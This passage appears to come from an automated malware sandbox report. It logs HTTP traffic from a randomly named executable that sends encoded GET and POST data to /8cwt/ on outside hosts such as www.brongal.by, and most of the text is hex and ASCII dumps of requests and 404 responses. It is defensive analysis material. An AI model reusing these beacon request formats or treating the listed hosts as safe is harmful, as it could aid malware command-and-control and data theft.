                                      Data Raw: 32 34 65 6c 75 58 3d 6f 38 61 74 65 31 71 36 4d 71 6f 6f 38 42 6a 59 50 62 43 53 74 2f 36 50 5a 63 37 75 79 68 7a 41 75 2f 73 74 73 33 72 57 57 6a 77 4f 50 44 71 39 74 6a 66 68 39 34 4c 6e 4b 34 6b 36 4d 58 52 4a 36 4b 35 4e 73 4c 49 71 4e 6d 79 4a 75 74 77 72 52 74 39 39 6d 71 57 72 69 55 6c 4a 61 6e 61 72 5a 36 6c 56 73 36 59 4f 67 2f 5a 68 34 68 41 6c 46 51 58 75 69 6f 70 4c 4f 45 2f 66 38 67 55 30 67 4b 42 70 6e 6b 78 59 52 51 79 65 2f 6d 64 77 70 44 58 32 43 47 53 7a 48 43 38 44 68 33 45 43 45 65 53 54 51 33 43 6b 2f 6e 73 48 62 64 55 73 68 52 37 73 65 4e 53 66 69 39 63 73 74 47 43 7a 30 48 70 39 4c 45 79 36 78 47 64 73 66 6d 44 64 37 4d 73 57 56 59 44 31 7a 4b 79 58 6a 34 32 6f 42 45 55 4d 31 30 42 6f 78 31 66 49 6a 2f 55 30 72 76 37 4e 6a 77 55 70 57 4b 42 6a 41 2b 64 58 31 44 35 6c 67 4d 6d 62 44 4f 75 55 2f 4c 49 44 70 4c 59 66 6d 79 4e 31 47 6a 4f 6f 7a 6a 34 36 76 42 6f 77 56 47 6a 49 48 63 74 73 78 30 31 4f 2b 76 4c 48 46 75 39 58 31 69 56 46 64 56 74 37 2f 30 7a 37 64 61 44 61 45 75 4c [TRUNCATED]
                                      Data Ascii: 24eluX=o8ate1q6Mqoo8BjYPbCSt/6PZc7uyhzAu/sts3rWWjwOPDq9tjfh94LnK4k6MXRJ6K5NsLIqNmyJutwrRt99mqWriUlJanarZ6lVs6YOg/Zh4hAlFQXuiopLOE/f8gU0gKBpnkxYRQye/mdwpDX2CGSzHC8Dh3ECEeSTQ3Ck/nsHbdUshR7seNSfi9cstGCz0Hp9LEy6xGdsfmDd7MsWVYD1zKyXj42oBEUM10Box1fIj/U0rv7NjwUpWKBjA+dX1D5lgMmbDOuU/LIDpLYfmyN1GjOozj46vBowVGjIHctsx01O+vLHFu9X1iVFdVt7/0z7daDaEuLwFXBcvxWQsUm/OsWjZlbluP82DaWf59avvSOb9oxduX0VYYYkhr0OhAl/L1blhCy6ZQzXhvtWYWyucux2zOvYBqbK3HBeYW5WZnVTVfnHvWsmIdl2jWLktdyqJ+COZDBMp3pt/khbBGVziXh+LEeVF+ASSPj4nQAodAUBhg50WSDnsfF7W6Z3mrCyr7Wnc5DNe0oenDlgOGKPFHF0timkwlyVCTV4jcDHLM7tQspGq0xHpuRlO1GHLwWvnFSrQ7Tndhgw/ATIUDw4cfRKbbVLaxZqEp+vfQPvdFuz9FWRPYww1BNwJ1yQmno/ohclUe6g69PspmmQ9lyX03M3AaikHL1FaJ1vE9OW4r8DJ3bKM8IrGa6yazOd2kIkZdmfH6B3+KjiCNhQo9o8GT/TbzokJ09A18emwjZgJ5hPal90rueSb5vCHlB/GRX2/eRcHntskF+zgNQhnrPPF8+F/4ow90vsUqlGKAcR4djgqAv2jLMbLgML/vhsjroEG1uT+9PEjIdVSUA1ErEk1ShSITtbCkzXtdtUYz/NmgtqiHWNJrx6GJGUEoTJNI+jrl4lJQm2sFyRD+PBjMY8nx9GD6FWtBtqnR4AzYTSLH0WtHIXzdQt9uJ+Qh6HIIj3mdEY+GXOCRniS/FKc1hH1QRSQgRFEbYgbWkXoUIpN [TRUNCATED]
                                      Jun 4, 2024 14:18:08.420351028 CEST1289INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:18:06 GMT
                                      Content-Type: text/html
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT
                                      ETag: W/"afe-6014d9a904f4f"
                                      Content-Encoding: gzip
                                      Data Raw: 35 31 39 0d 0a 1f 8b 08 00 00 00 00 00 04 03 8d 56 cf 6f 13 47 14 3e 7b ff 8a 61 a3 4a 25 ca 66 63 27 71 a8 b1 ad 4a 10 0a 2d 90 08 4a a1 a7 6a bc 3b b6 a7 ac 77 ac dd 75 12 b7 ca 1f 63 32 53 d1 12 95 08 50 49 0a 88 aa a0 36 4d 4b 28 ad 82 2a 0e a0 aa 97 26 d0 0b 51 a5 1e fb 66 67 d6 5e 27 06 b1 17 7b df cf ef 7d ef cd db 29 1e 38 3a 73 e4 c3 8f 67 a7 51 3d 6a 78 65 a3 28 7f 90 87 fd 5a c9 fc 14 9b 52 40 b0 0b 3f 0d 12 61 e4 d4 71 10 92 a8 64 4e 9f 3b 62 bd 3f 6b 22 1b 34 11 8d 3c 52 9e 18 9b 40 c7 a8 47 d0 69 16 a1 63 ac e5 bb 45 5b 69 b4 af 8f 1b a4 64 3a ac d9 0e 68 ad 1e 99 c8 61 7e 44 7c 08 76 24 91 a1 0b 67 a7 cf 7c 34 7d 06 9d f0 9d 51 99 3b 4e aa 1c 03 56 61 51 98 f2 3a 71 fa e8 f4 85 91 63 33 27 4f ce 9c 57 40 52 d6 73 94 cc 37 59 90 ce 32 4f dd a8 5e 72 c9 1c 75 88 15 bf 8c 50 9f 46 14 7b 56 e8 60 8f 94 b2 a3 63 23 0d 10 35 5a 8d 9e 44 a2 08 a3 36 d4 15 b5 9b 80 3f 22 0b 91 ed 84 21 c8 87 d1 e7 06 82 a7 81 83 1a f5 0b 68 ec 70 fc da c4 ae 4b fd 5a fc be 68 d0 46 4d 9b 55 58 e0 92 40 8b 5b [TRUNCATED]
                                      Data Ascii: 519VoG>{aJ%fc'qJ-Jj;wuc2SPI6MK(*&Qfg^'{})8:sgQ=jxe(ZR@?aqdN;b?k"4<R@GicE[id:ha~D|v$g|4}Q;NVaQ:qc3'OW@Rs7Y2O^ruPF{V`c#5ZD6?"!hpKZhFMUX@[jk#rqX4lU[yRZ i.;)Yan[GV7Sp#2G)B6A)2OEN&~kyfKq`RRV=x'VPvtBHC)LlaXJ0ul\$7\HE*ske?A@I`#FHh>N9Q3i+`?5)rhI$EDK>gTQ0u*5VG]4T.k}B ~RG'qVd!B2pyl$)F4kG"%+lb'>"IYtvRO@xZ{5aT=x-R3)Bn#{m]6l0`"A@L[cl<E#SG+I`^u>|Y|.uNMWE<qxLFn(i8HUhCN_4^$;+l6M1?tz#~2D|Wz7t!9),KQ8xa%9s{Qo/|mu1.C-r [TRUNCATED]
                                      Jun 4, 2024 14:18:08.420361996 CEST300INData Raw: b1 9e 2d 17 25 39 f2 2e 02 9e f2 5f b1 12 c8 3b 8a 54 cb 67 ef 05 05 3c b4 6b ae 2c 2e 89 ab e2 96 58 e3 37 f9 df fc 0b be 0e bf 77 c5 13 38 8d ab fc e1 ea 15 7e 9f 5f e1 3b fc 29 bf c5 77 f9 8f 52 d7 59 02 50 39 ed df 44 8e 87 c3 b0 64 ea c5 69
                                      Data Ascii: -%9._;Tg<k,.X7w8~_;)wRYP9Ddiu).mswRuma`_lVOLW61oVke_$qm]UY~x?'=:-sX[J{m/W~?,;s:


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      20192.168.11.3049867162.43.104.164802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:18:10.959743023 CEST432OUTGET /8cwt/?24eluX=l+yNdBmIbZk94DyhKMCQgPu5et7F5Fjr+MUK0mOzdhwjPjmD5w+n15/KVowCPgtS4Y9yjKxUIxHTxuQuQfpR6KughRwQexCRaaEyjIZ4vPoy+iMgbgX/vtU=&Mjnd0=JZHP8Tx0t6 HTTP/1.1
                                      Host: www.shun-yamagata.com
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.9
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Jun 4, 2024 14:18:11.269223928 CEST1289INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Tue, 04 Jun 2024 12:18:09 GMT
                                      Content-Type: text/html
                                      Content-Length: 2814
                                      Connection: close
                                      Vary: Accept-Encoding
                                      Last-Modified: Tue, 25 Jul 2023 10:57:57 GMT
                                      ETag: "afe-6014d9a904f4f"
                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 46 69 6c 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 [TRUNCATED]
                                      Data Ascii: <!DOCTYPE html><html lang="ja"><head><meta charset="EUC-JP" /><title>404 File Not Found</title><meta name="copyright" content="Copyright XSERVER Inc."><meta name="robots" content="INDEX,FOLLOW" /><meta name="viewport" content="width=device-width,initial-scale=1.0,minimum-scale=1.0"><style type="text/css">* { margin: 0; padding: 0;}img { border: 0;}ul { padding-left: 2em;}html { overflow-y: scroll; background: #3b79b7;}body { font-family: "", Meiryo, " ", "MS PGothic", " Pro W3", "Hiragino Kaku Gothic Pro", sans-serif; margin: 0; line-height: 1.4; font-size: 75%; text-align: center; color: white;}h1 { font-size: 24px; font-weight: bold;}h1 { font-weight: bold; line-height: 1; padding-bottom: 20px; font-family: Helvetica, sans-serif;}h2 { text-align: center; font-weight: bold; font-size: 27px;}p { text-align: center; font-size: 14px; margin: 0; [TRUNCATED]
                                      Jun 4, 2024 14:18:11.269238949 CEST1289INData Raw: 70 6c 61 69 6e 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 66 66 66 3b 0a 20 20 20 20 6c 69 6e
                                      Data Ascii: plain { border-top: 1px solid #fff; border-bottom: 1px solid #fff; line-height: 1.5; margin: 30px auto; padding: 17px;}#cause { text-align: left;}#cause li { color: #666;}h3 { letter-spacing: 1px; font
                                      Jun 4, 2024 14:18:11.269294977 CEST476INData Raw: a5 b8 a4 cf b8 ab a4 c4 a4 ab a4 ea a4 de a4 bb a4 f3 a4 c7 a4 b7 a4 bf a1 a3 3c 2f 68 32 3e 0a 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 65 78 70 6c 61 69 6e 22 3e a4 b3 a4 ce a5 a8 a5 e9 a1 bc a4 cf a1 a2 bb d8 c4 ea a4 b7 a4 bf a5 da a1 bc a5
                                      Data Ascii: </h2> <p class="explain"></p> <h3></h3> <div id="white_box"> <div id="cause"> <ul>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      21192.168.11.304986893.125.99.134802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:18:26.097327948 CEST680OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.brongal.by
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.brongal.by
                                      Referer: http://www.brongal.by/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 203
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 37 4a 63 51 37 6f 49 41 62 76 67 52 52 33 79 37 58 38 55 4c 53 55 54 39 43 45 42 6e 74 33 79 56 66 70 4e 35 66 61 4b 61 42 68 6a 47 6d 4e 71 78 6c 75 67 35 72 72 43 55 5a 47 4c 33 57 4c 6f 6e 75 34 45 4c 4f 62 36 62 53 68 68 49 61 64 57 4c 72 52 50 2b 61 6e 56 37 4c 50 32 71 2b 58 4a 69 6c 4c 78 53 71 30 65 41 6b 63 36 39 48 78 42 61 63 48 37 72 6b 71 54 44 48 55 68 63 69 6f 5a 34 6b 47 55 50 31 6e 59 57 72 49 2b 58 6a 76 61 51 46 30 74 6d 64 54 35 6a 6e 50 47 30 39 2b 63 4e 72 46 4b 54 34 45 42 58 62 43 57 76 4e 71 68 48 79 69 6b 6b 65 71 64 36 5a 61 66 71 37 75 57 42 37 67 3d 3d
                                      Data Ascii: 24eluX=7JcQ7oIAbvgRR3y7X8ULSUT9CEBnt3yVfpN5faKaBhjGmNqxlug5rrCUZGL3WLonu4ELOb6bShhIadWLrRP+anV7LP2q+XJilLxSq0eAkc69HxBacH7rkqTDHUhcioZ4kGUP1nYWrI+XjvaQF0tmdT5jnPG09+cNrFKT4EBXbCWvNqhHyikkeqd6Zafq7uWB7g==
                                      Jun 4, 2024 14:18:26.778142929 CEST1289INHTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:18:26 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      x-powered-by: PHP/7.4.33
                                      x-litespeed-tag: 2cc_HTTP.404
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      link: <https://brongal.by/wp-json/>; rel="https://api.w.org/"
                                      x-litespeed-cache-control: no-cache
                                      content-encoding: gzip
                                      vary: Accept-Encoding
                                      x-turbo-charged-by: LiteSpeed
                                      Data Raw: 33 33 63 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 46 92 d8 e7 66 84 fe 43 0d e4 ed 26 25 00 04 c0 37 d9 6c ad 34 92 76 65 cf 48 b2 66 e6 b4 be e9 09 46 11 28 92 e8 01 01 2c 0a ec 87 5a 8c d8 dd b3 cf 1f 7c 11 b6 c3 1f 1c 61 47 d8 71 1f fd 4d be 5d 9d f7 ee 56 fa e0 5f c0 f9 47 8e ac 07 50 20 41 36 fb b1 d6 ee 85 26 24 36 59 8f cc ac ac ac ac ac 47 66 1d 3f f2 22 37 bd 8a 09 9a a5 f3 e0 a4 72 0c 7f 50 80 c3 e9 50 4b 16 c6 17 2f 34 48 23 d8 3b a9 1c 1c cf 49 8a 91 3b c3 09 25 e9 50 7b f1 fc 63 a3 ab 65 e9 21 9e 93 a1 76 ee 93 8b 38 4a 52 0d b9 51 98 92 30 1d 6a 17 be 97 ce 86 1e 39 f7 5d 62 b0 1f 3a f2 43 3f f5 71 60 50 17 07 64 68 33 28 81 1f be 46 09 09 86 5a 9c 44 13 3f 20 1a 9a 25 64 32 d4 66 69 1a d3 7e bd 3e 9d c7 53 33 4a a6 f5 cb 49 58 b7 79 25 46 12 43 7d 94 44 e3 28 a5 47 19 e2 a3 30 f2 43 8f 5c ea 68 12 05 41 74 71 84 ea 27 95 ca c1 f1 23 c3 40 cf 67 3e 45 d4 4f 09 f2 29 8a e2 d4 9f fb 5f 11 0f 5d f8 e9 0c a5 33 82 fe 4d 84 69 8a 9e 7d f4 19 8a 83 c5 d4 0f d1 b9 e3 98 0d 64 20 [TRUNCATED]
                                      Data Ascii: 33cb}kFfC&%7l4veHfF(,Z|aGqM]V_GP A6&$6YGf?"7rPPK/4H#;I;%P{ce!v8JRQ0j9]b:C?q`Pdh3(FZD? %d2fi~>S3JIXy%FC}D(G0C\hAtq'#@g>EO)_]3Mi}d I0h^/Nu^)03do~WoV~Wwo?~!}Du^K2<N$P )M/^h4?RvlzQ$k8|~3rLPc4;#slLkLz.S>/OykCk_3?%{J19}A@k$(/kX_5Q5M8$Zz(5\[ZqT3k)N$eE>SNs2BP*M})9JI24$W`oB~!66hWOp8])`jaLm.1z_W~V~n=\}5_Yt3+oVt7h|dq
                                      Jun 4, 2024 14:18:26.778270960 CEST1289INData Raw: 25 2d db d5 80 3a 97 c2 3a 00 ad fb 00 a9 be 0b fd 45 6c 08 35 58 5f c4 41 84 3d 5a 77 2c a7 59 b7 1a 75 d1 57 06 40 b2 4d 7a 0e 52 2d ca be d8 26 9b b7 04 c7 74 ad d6 6f 77 74 6d 46 fc e9 2c d5 fa 0d 5b d7 5c 1c 73 e9 d3 ee cb f8 a5 ae 31 1e ec
                                      Data Ascii: %-::El5X_A=Zw,YuW@MzR-&towtmF,[\s1e<[._-|T\&q65y!5LHpT4WL5$aw/E4@oVOEH{x0_aI_~vw;q)+IF_]3IS?R4D
                                      Jun 4, 2024 14:18:26.778368950 CEST1289INData Raw: 57 ab 6a ef be 5c 9b 85 69 4d 5f 28 65 f4 58 f9 f1 ca 3c 8b fc b0 aa e9 5a ed 5d ad 56 1b 68 7a c2 c4 09 50 56 5f 92 57 fa 35 28 8e be 06 23 b3 7e 86 cf b1 18 1f 4b 18 de a0 17 b8 42 a9 96 b4 a5 9a d4 f4 6b 58 b3 f5 b5 8b 18 3a 81 8f 02 29 fd f9
                                      Data Ascii: Wj\iM_(eX<Z]VhzPV_W5(#~KBkX:)=|(6BFjn519H>Va\+]E'U/V[l30(&QRec!"|L_T|eCpTRd0F-,=4?)h#[>A0jjAk5EJ
                                      Jun 4, 2024 14:18:26.778383970 CEST1289INData Raw: 6e 8e dd 6e e8 d0 d9 b6 73 a3 18 cd 7d 2f 04 75 b8 1b 87 de d0 6d a7 97 c1 6f 5a ba 6d b7 75 a7 b5 a5 f7 32 b3 c4 30 e8 1c 07 41 1f d9 8d f8 72 4d 1f 2b 85 c0 92 83 c1 e7 58 bb 4a 05 70 80 d9 47 8d f6 ae 42 97 86 28 d6 74 36 8a d1 18 bb 7e 38 35
                                      Data Ascii: nns}/umoZmu20ArM+XJpGB(t6~85#l62_#*+`EEV;[ovh[}"fJiKa8]$8v|M>aax}d^hY%jNsYE+V7?<5=kau6;kebFR5}j*
                                      Jun 4, 2024 14:18:26.778498888 CEST1289INData Raw: 69 b2 94 a6 92 d2 62 29 2d 25 a5 cd 52 da 4a 4a 87 a5 74 94 94 2e 4b e9 2a 29 3d 96 d2 cb 52 3a 8f 39 a9 ef 3e 0b f0 f8 cf 82 de a7 c0 7a 92 24 38 fd d3 27 f7 f0 6d ab d1 1d 88 fb 03 43 7a 81 63 9e 42 17 63 88 a6 e1 5e 25 7e 10 f8 2e 4f cc 7c 52
                                      Data Ascii: ib)-%RJJt.K*)=R:9>z$8'mCzcBc^%~.O|Rw-N!"IS.GIDiS?<Qe,wy;+0>{X{/}<Hbg{OuC^QD2J!>y\)NS<5hs'U"pC(\\\
                                      Jun 4, 2024 14:18:26.778513908 CEST1289INData Raw: 80 5c 7a 39 1e e4 ff 8e f1 9a 3d 9c 9b b0 52 4c 0f 0e 8e fd f9 54 4e 68 ed 8e 86 e4 34 d7 b0 b5 e2 94 99 57 06 fb 77 7d 99 be 3d 9c 93 54 85 38 4d b1 3b 03 2f 58 63 b2 08 02 04 0e 80 fc 1b 84 a8 81 10 52 b0 12 ef 68 08 07 e9 50 83 59 4b b6 84 a9
                                      Data Ascii: \z9=RLTNh4Ww}=T8M;/XcRhPYK;={JWPUvnH.4F9@)'t168R%@(p,3h`{eFMAyxLISF7o,J@<Ybf(/40Sqz>y$S
                                      Jun 4, 2024 14:18:26.778531075 CEST1289INData Raw: b9 3e 0e 98 5d 40 47 10 3d 7f e4 fa 89 1b 90 11 04 92 1d 91 c9 84 9d 4e b2 ad 5a b0 f5 05 82 9b 17 db 1c 8d d8 c7 bc 0d b2 fb ac c3 e0 88 85 1d 5d a1 67 ac 59 e8 13 37 0a 29 fa 12 1e 05 78 cc 9a 85 3e f6 83 00 7d c4 9a c5 23 fc 1f f0 73 50 38 2d
                                      Data Ascii: >]@G=NZ]gY7)x>}#sP8-b 4He\+Es?%$,4sq_El4@`t wmx#mrG|yg5: 6?v9=Vng-wDcnqdu1%z9-{74N
                                      Jun 4, 2024 14:18:26.778543949 CEST1289INData Raw: 2a 05 6e 1f c8 8b 0d 88 0f 70 b9 b5 21 9e 1e e0 11 e9 f9 d2 43 c4 75 84 88 9a 76 0b 64 19 d4 c1 da 3d 37 24 2e ba f1 35 df 9e e3 ad a0 17 58 94 c9 6d 5a 21 5f 6e 58 d6 f9 0c 28 90 ea c8 b8 54 15 92 32 c8 40 74 d7 77 6c 10 62 11 2e 3d 3f 21 ec 19
                                      Data Ascii: *np!Cuvd=7$.5XmZ!_nX(T2@twlb.=?!>w{FAFee6)'L;*lu8,Dh}ho]l)g*KN/4VJ(wcKg|trpC\^EXCnAM+wHzo46?f^#$aX
                                      Jun 4, 2024 14:18:26.778554916 CEST1289INData Raw: 53 71 eb 63 bd 57 76 63 5b c4 6b b8 58 e3 64 a3 95 1b cf 05 8c 42 02 b8 fb 1f 53 c9 4c d4 84 f8 f3 08 21 e2 07 74 66 14 42 ac 8f 4c 04 d7 c4 86 db 9c 4a 37 1f 1c 28 1c ce 79 0d df 0a 3c 28 99 b4 37 3a b9 08 4a b4 ab 08 73 03 ae dc 5e cb 6c 8c 92
                                      Data Ascii: SqcWvc[kXdBSL!tfBLJ7(y<(7:Js^lbnO<,`Zx(L\*"qa/eKdy_Jg#X-d*XoW"`Z@S4WS`.j'?1[j"k*<W:loCSJ%p.[KG
                                      Jun 4, 2024 14:18:26.778590918 CEST1289INData Raw: ba 04 8e 54 ec 6e b8 05 25 9c 4d e4 25 b8 cf 8b 76 52 b9 88 4d 86 81 92 f4 49 e4 e2 80 7c 88 53 5c 45 d7 88 85 f2 43 99 23 ee e9 c2 b2 ac 66 90 26 47 7d f4 12 1d c1 17 f4 0a 2d 51 6d 90 3f fa 95 cd 54 80 2b 1f 9e f0 8e 66 36 18 ce a8 c1 bd 2a b5
                                      Data Ascii: Tn%M%vRMI|S\EC#f&G}-Qm?T+f6*9NPJIxF1{`"xFgSi1<Z.ZVmiH5t~T1^hWuMB]vumkt@?%EfLKQH'}ck3LGnSh}x
                                      Jun 4, 2024 14:18:26.778603077 CEST860INData Raw: 64 5c 83 70 10 0c 5c 73 a2 e9 1a 7b fb 0f 5a df d1 35 61 cd 8e 0a 69 32 c0 96 d6 d7 e6 f8 52 63 ac 15 6f f8 66 4b 4c 71 2d 96 5c a6 09 7e b8 f6 f3 d1 ac b2 89 b3 8f b3 72 ab 72 bc 37 2f ba 20 12 6b bc e0 69 3b 79 c1 2c 3f 58 c4 b1 57 5f 37 d8 c0
                                      Data Ascii: d\p\s{Z5ai2RcofKLq-\~rr7/ ki;y,?XW_77Xesxrw~-^rr[jcmH#T.an|v{#x^d\iQ9\lN"7+/1Y1=;DtC|: ,IB_A)<fz


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      22192.168.11.304986993.125.99.134802980C:\Program Files (x86)\vkkmQgeVChFWDAaYJODeNaycsAxpfdiaHFspXdJfCmTsgExhz\SLePhgUCFUcrYZVod.exe
                                      TimestampBytes transferredDirectionData
                                      Jun 4, 2024 14:18:28.874996901 CEST700OUTPOST /8cwt/ HTTP/1.1
                                      Host: www.brongal.by
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Encoding: gzip, deflate
                                      Accept-Language: en-US,en;q=0.9
                                      Origin: http://www.brongal.by
                                      Referer: http://www.brongal.by/8cwt/
                                      Content-Type: application/x-www-form-urlencoded
                                      Connection: close
                                      Cache-Control: no-cache
                                      Content-Length: 223
                                      User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/42.0 Safari/537.31
                                      Data Raw: 32 34 65 6c 75 58 3d 37 4a 63 51 37 6f 49 41 62 76 67 52 53 57 43 37 59 37 67 4c 56 30 54 79 62 45 42 6e 6b 58 79 5a 66 70 42 35 66 62 65 4b 41 54 33 47 6c 76 43 78 6b 71 4d 35 6d 4c 43 55 54 6d 4c 32 49 37 6f 73 75 34 59 74 4f 62 47 62 53 68 31 49 61 5a 65 4c 72 69 6e 39 41 58 56 35 53 2f 32 6f 39 6e 4a 69 6c 4c 78 53 71 33 6a 72 6b 64 53 39 48 41 78 61 65 69 48 6f 75 4b 54 45 41 55 68 63 70 49 5a 30 6b 47 56 71 31 6a 42 37 72 4b 32 58 6a 72 53 51 43 6c 74 68 54 6a 35 6c 71 76 48 30 36 74 6b 43 7a 6d 4b 56 2b 46 31 61 5a 7a 53 61 42 64 51 64 76 68 51 6d 4e 4b 68 58 46 62 79 43 35 73 58 61 6d 6b 36 42 38 30 30 54 39 70 72 65 30 36 54 52 4a 71 31 62 70 5a 73 3d
                                      Data Ascii: 24eluX=7JcQ7oIAbvgRSWC7Y7gLV0TybEBnkXyZfpB5fbeKAT3GlvCxkqM5mLCUTmL2I7osu4YtObGbSh1IaZeLrin9AXV5S/2o9nJilLxSq3jrkdS9HAxaeiHouKTEAUhcpIZ0kGVq1jB7rK2XjrSQClthTj5lqvH06tkCzmKV+F1aZzSaBdQdvhQmNKhXFbyC5sXamk6B800T9pre06TRJq1bpZs=
                                      Jun 4, 2024 14:18:29.506695032 CEST1289INHTTP/1.1 404 Not Found
                                      Date: Tue, 04 Jun 2024 12:18:29 GMT
                                      Content-Type: text/html; charset=UTF-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      x-powered-by: PHP/7.4.33
                                      x-litespeed-tag: 2cc_HTTP.404
                                      expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      cache-control: no-cache, must-revalidate, max-age=0
                                      link: <https://brongal.by/wp-json/>; rel="https://api.w.org/"
                                      x-litespeed-cache-control: no-cache
                                      content-encoding: gzip
                                      vary: Accept-Encoding
                                      x-turbo-charged-by: LiteSpeed
                                      Data Raw: 33 33 63 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec 7d 6b 93 e3 46 92 d8 e7 66 84 fe 43 0d e4 ed 26 25 00 04 c0 37 d9 6c ad 34 92 76 65 cf 48 b2 66 e6 b4 be e9 09 46 11 28 92 e8 01 01 2c 0a ec 87 5a 8c d8 dd b3 cf 1f 7c 11 b6 c3 1f 1c 61 47 d8 71 1f fd 4d be 5d 9d f7 ee 56 fa e0 5f c0 f9 47 8e ac 07 50 20 41 36 fb b1 d6 ee 85 26 24 36 59 8f cc ac ac ac ac ac 47 66 1d 3f f2 22 37 bd 8a 09 9a a5 f3 e0 a4 72 0c 7f 50 80 c3 e9 50 4b 16 c6 17 2f 34 48 23 d8 3b a9 1c 1c cf 49 8a 91 3b c3 09 25 e9 50 7b f1 fc 63 a3 ab 65 e9 21 9e 93 a1 76 ee 93 8b 38 4a 52 0d b9 51 98 92 30 1d 6a 17 be 97 ce 86 1e 39 f7 5d 62 b0 1f 3a f2 43 3f f5 71 60 50 17 07 64 68 33 28 81 1f be 46 09 09 86 5a 9c 44 13 3f 20 1a 9a 25 64 32 d4 66 69 1a d3 7e bd 3e 9d c7 53 33 4a a6 f5 cb 49 58 b7 79 25 46 12 43 7d 94 44 e3 28 a5 47 19 e2 a3 30 f2 43 8f 5c ea 68 12 05 41 74 71 84 ea 27 95 ca c1 f1 23 c3 40 cf 67 3e 45 d4 4f 09 f2 29 8a e2 d4 9f fb 5f 11 0f 5d f8 e9 0c a5 33 82 fe 4d 84 69 8a 9e 7d f4 19 8a 83 c5 d4 0f d1 b9 e3 98 0d 64 20 [TRUNCATED]
                                      Data Ascii: 33cb}kFfC&%7l4veHfF(,Z|aGqM]V_GP A6&$6YGf?"7rPPK/4H#;I;%P{ce!v8JRQ0j9]b:C?q`Pdh3(FZD? %d2fi~>S3JIXy%FC}D(G0C\hAtq'#@g>EO)_]3Mi}d I0h^/Nu^)03do~WoV~Wwo?~!}Du^K2<N$P )M/^h4?RvlzQ$k8|~3rLPc4;#slLkLz.S>/OykCk_3?%{J19}A@k$(/kX_5Q5M8$Zz(5\[ZqT3k)N$eE>SNs2BP*M})9JI24$W`oB~!66hWOp8])`jaLm.1z_W~V~n=\}5_Yt3+oVt7h|dq
